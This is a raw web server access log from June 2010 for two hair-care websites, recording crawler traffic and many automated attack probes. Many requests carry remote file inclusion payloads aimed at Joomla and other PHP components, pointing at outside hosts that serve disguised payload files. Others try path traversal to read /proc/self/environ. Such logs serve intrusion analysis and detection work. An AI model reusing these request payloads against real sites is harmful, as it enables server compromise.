195.191.40.23 - - [07/Jun/2010:04:51:14 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; (R1 1.5))" "freehairsecrets.com"
77.222.56.62 - - [07/Jun/2010:04:52:29 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
77.222.56.62 - - [07/Jun/2010:04:52:29 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
77.222.56.62 - - [07/Jun/2010:04:52:37 -0700] "GET /logs/access_100412.logcomponents/com_sitemap/sitemap.php?mosConfig_admin_path=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.222.56.62 - - [07/Jun/2010:04:52:37 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.222.56.62 - - [07/Jun/2010:04:52:38 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
208.115.111.248 - - [07/Jun/2010:04:52:54 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
77.222.56.62 - - [07/Jun/2010:04:58:35 -0700] "GET /logs/access_100322.logcomponents/com_sitemap/sitemap.php?mosConfig_admin_path=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
64.15.156.75 - - [07/Jun/2010:04:58:39 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.15.156.75 - - [07/Jun/2010:04:58:39 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.15.156.75 - - [07/Jun/2010:04:58:39 -0700] "GET /logs/access_100510.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.144.176 - - [07/Jun/2010:04:59:14 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.144.176 - - [07/Jun/2010:04:59:14 -0700] "GET /logs/access_100510.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.144.176 - - [07/Jun/2010:04:59:14 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.129.119.12 - - [07/Jun/2010:05:01:05 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "growlonghairfast.com"
94.23.31.164 - - [07/Jun/2010:05:04:54 -0700] "GET /logs/components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
94.23.31.164 - - [07/Jun/2010:05:04:54 -0700] "GET /components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
94.23.31.164 - - [07/Jun/2010:05:04:54 -0700] "GET /logs/access_100412.log/components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
216.129.119.41 - - [07/Jun/2010:05:12:33 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "growlonghairfast.com"
64.15.156.75 - - [07/Jun/2010:05:18:08 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.biasy.net//modules/news_afp/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
64.15.156.75 - - [07/Jun/2010:05:18:09 -0700] "GET /logs/access_100510.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.biasy.net//modules/news_afp/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
64.15.156.75 - - [07/Jun/2010:05:18:09 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.biasy.net//modules/news_afp/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
92.113.143.11 - - [07/Jun/2010:05:19:21 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/3.0 (x86 [en] Windows NT 5.1; Sun)" "growlonghairfast.com"
110.45.144.176 - - [07/Jun/2010:05:21:08 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.biasy.net//modules/news_afp/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
110.45.144.176 - - [07/Jun/2010:05:21:08 -0700] "GET /logs/access_100510.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.biasy.net//modules/news_afp/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
110.45.144.176 - - [07/Jun/2010:05:21:08 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.biasy.net//modules/news_afp/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
208.115.111.248 - - [07/Jun/2010:05:21:49 -0700] "GET /freehairsecretsphp/viewtopic.php?p=11412 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [07/Jun/2010:05:21:57 -0700] "GET /freehairsecretsphp/viewtopic.php?p=17595 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [07/Jun/2010:05:22:02 -0700] "GET /freehairsecretsphp/viewtopic.php?p=17974 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [07/Jun/2010:05:22:07 -0700] "GET /freehairsecretsphp/viewtopic.php?p=17984 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [07/Jun/2010:05:22:07 -0700] "GET /freehairsecretsphp/viewtopic.php?p=2070 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [07/Jun/2010:05:22:13 -0700] "GET /freehairsecretsphp/viewtopic.php?p=208 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [07/Jun/2010:05:22:16 -0700] "GET /freehairsecretsphp/viewtopic.php?p=2711 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [07/Jun/2010:05:22:20 -0700] "GET /freehairsecretsphp/viewtopic.php?p=8198 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [07/Jun/2010:05:22:22 -0700] "GET /logs/?D=D HTTP/1.1" 200 5800 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [07/Jun/2010:05:22:25 -0700] "GET /logs/?M=D HTTP/1.1" 200 5800 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
115.68.20.185 - - [07/Jun/2010:05:24:23 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.biasy.net//modules/news_afp/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
115.68.20.185 - - [07/Jun/2010:05:24:23 -0700] "GET /logs/access_100510.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.biasy.net//modules/news_afp/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
115.68.20.185 - - [07/Jun/2010:05:24:29 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.biasy.net//modules/news_afp/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
208.80.193.42 - - [07/Jun/2010:05:27:09 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.2.0; yplus 5.6.04b)" "www.freehairsecrets.com"
89.185.231.103 - - [07/Jun/2010:05:41:51 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.185.231.103 - - [07/Jun/2010:05:41:51 -0700] "GET /logs/access_100125.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.185.231.103 - - [07/Jun/2010:05:41:51 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.18.137.210 - - [07/Jun/2010:05:47:52 -0700] "GET /skin/zero_vote/error.php?dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.18.137.210 - - [07/Jun/2010:05:47:52 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.18.137.210 - - [07/Jun/2010:05:47:52 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.14.126.220 - - [07/Jun/2010:05:48:25 -0700] "GET /logs/access_100405.log//index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
216.14.126.220 - - [07/Jun/2010:05:48:25 -0700] "GET /index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
216.14.126.220 - - [07/Jun/2010:05:48:25 -0700] "GET /logs//index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
77.222.56.62 - - [07/Jun/2010:05:48:58 -0700] "GET /write.php?dir=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
77.222.56.62 - - [07/Jun/2010:05:48:58 -0700] "GET /logs//write.php?dir=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
72.18.137.210 - - [07/Jun/2010:05:49:09 -0700] "GET /skin/zero_vote/error.php?dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.18.137.210 - - [07/Jun/2010:05:49:09 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.18.137.210 - - [07/Jun/2010:05:49:09 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.18.137.210 - - [07/Jun/2010:05:50:01 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.18.137.210 - - [07/Jun/2010:05:50:01 -0700] "GET /skin/zero_vote/error.php?dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.18.137.210 - - [07/Jun/2010:05:50:01 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.18.137.210 - - [07/Jun/2010:05:50:11 -0700] "GET /skin/zero_vote/error.php?dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.18.137.210 - - [07/Jun/2010:05:50:11 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.18.137.210 - - [07/Jun/2010:05:50:11 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.18.137.210 - - [07/Jun/2010:05:50:25 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.18.137.210 - - [07/Jun/2010:05:50:25 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.18.137.210 - - [07/Jun/2010:05:50:25 -0700] "GET /skin/zero_vote/error.php?dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
83.223.118.6 - - [07/Jun/2010:05:51:08 -0700] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.elracodelangela.com//templates/beez/upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
83.223.118.6 - - [07/Jun/2010:05:51:08 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.elracodelangela.com//templates/beez/upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
83.223.118.6 - - [07/Jun/2010:05:51:08 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.elracodelangela.com//templates/beez/upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
83.223.118.6 - - [07/Jun/2010:05:51:24 -0700] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.elracodelangela.com//templates/beez/upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
83.223.118.6 - - [07/Jun/2010:05:51:24 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.elracodelangela.com//templates/beez/upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
83.223.118.6 - - [07/Jun/2010:05:51:24 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.elracodelangela.com//templates/beez/upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
209.59.147.177 - - [07/Jun/2010:05:53:14 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.eglash.com/nucleus//nucleus/xmlrpc/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
209.59.147.177 - - [07/Jun/2010:05:53:14 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.eglash.com/nucleus//nucleus/xmlrpc/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
209.59.147.177 - - [07/Jun/2010:05:53:14 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.eglash.com/nucleus//nucleus/xmlrpc/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.18.137.210 - - [07/Jun/2010:05:53:34 -0700] "GET /skin/zero_vote/error.php?dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.18.137.210 - - [07/Jun/2010:05:53:34 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.18.137.210 - - [07/Jun/2010:05:53:34 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.129.119.40 - - [07/Jun/2010:05:53:52 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "growlonghairfast.com"
209.59.147.177 - - [07/Jun/2010:05:54:32 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.eglash.com/nucleus//nucleus/xmlrpc/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.59.147.177 - - [07/Jun/2010:05:54:32 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.eglash.com/nucleus//nucleus/xmlrpc/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.59.147.177 - - [07/Jun/2010:05:54:32 -0700] "GET /logs/access_100125.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.eglash.com/nucleus//nucleus/xmlrpc/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.59.147.177 - - [07/Jun/2010:05:57:52 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.eglash.com/nucleus//nucleus/xmlrpc/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.59.147.177 - - [07/Jun/2010:05:57:52 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.eglash.com/nucleus//nucleus/xmlrpc/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
209.59.147.177 - - [07/Jun/2010:05:58:15 -0700] "GET /logs/access_100125.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.eglash.com/nucleus//nucleus/xmlrpc/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.222.56.62 - - [07/Jun/2010:05:58:46 -0700] "GET /logs/access_100301.log/bbs.lib.inc.php?site_path=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.222.56.62 - - [07/Jun/2010:05:58:47 -0700] "GET /bbs.lib.inc.php?site_path=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.222.56.62 - - [07/Jun/2010:05:58:47 -0700] "GET /logs//bbs.lib.inc.php?site_path=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
121.88.4.141 - - [07/Jun/2010:06:00:08 -0700] "GET /?DNC=http://www.slotmachinesforum.com/1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [07/Jun/2010:06:00:13 -0700] "GET /logs/access_100412.log/?DNC=http://www.slotmachinesforum.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [07/Jun/2010:06:00:13 -0700] "GET /logs/?DNC=http://www.slotmachinesforum.com/1.txt? HTTP/1.1" 200 5800 "-" "Mozilla/5.0" "growlonghairfast.com"
211.43.212.56 - - [07/Jun/2010:06:02:50 -0700] "GET /skin/zero_vote/error.php?dir=http://www.pmaker.info/zbxe/files/1.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.43.212.56 - - [07/Jun/2010:06:02:50 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.pmaker.info/zbxe/files/1.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.43.212.56 - - [07/Jun/2010:06:02:53 -0700] "GET /logs/access_091207.log%20%20//skin/zero_vote/error.php?dir=http://www.pmaker.info/zbxe/files/1.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.14.126.220 - - [07/Jun/2010:06:04:00 -0700] "GET /index.php?option=com_performs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
211.43.212.56 - - [07/Jun/2010:06:05:49 -0700] "GET /skin/zero_vote/error.php?dir=http://www.pmaker.info/zbxe/files/1.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.43.212.56 - - [07/Jun/2010:06:05:49 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.pmaker.info/zbxe/files/1.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.43.212.56 - - [07/Jun/2010:06:05:59 -0700] "GET /logs/access_091207.log%20%20//skin/zero_vote/error.php?dir=http://www.pmaker.info/zbxe/files/1.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.222.56.62 - - [07/Jun/2010:06:07:49 -0700] "GET /bbs.lib.inc.php?site_path=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
77.222.56.62 - - [07/Jun/2010:06:07:50 -0700] "GET /logs//bbs.lib.inc.php?site_path=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
216.14.126.220 - - [07/Jun/2010:06:12:18 -0700] "GET /logs/access.log//index.php?option=com_performs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
216.14.126.220 - - [07/Jun/2010:06:12:18 -0700] "GET /index.php?option=com_performs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
216.14.126.220 - - [07/Jun/2010:06:12:18 -0700] "GET /logs//index.php?option=com_performs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
67.218.116.164 - - [07/Jun/2010:06:12:27 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "growlonghairfast.com"
216.129.119.43 - - [07/Jun/2010:06:17:33 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "growlonghairfast.com"
62.33.199.214 - - [07/Jun/2010:06:18:04 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://Can0oWalshmg0.spaces.live.com/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" "growlonghairfast.com"
62.33.199.214 - - [07/Jun/2010:06:18:04 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" "growlonghairfast.com"
118.129.167.25 - - [07/Jun/2010:06:20:13 -0700] "GET /logs/access_100510.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.167.25 - - [07/Jun/2010:06:20:14 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.167.25 - - [07/Jun/2010:06:20:14 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.14.126.220 - - [07/Jun/2010:06:20:15 -0700] "GET /logs/access_100405.log//index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
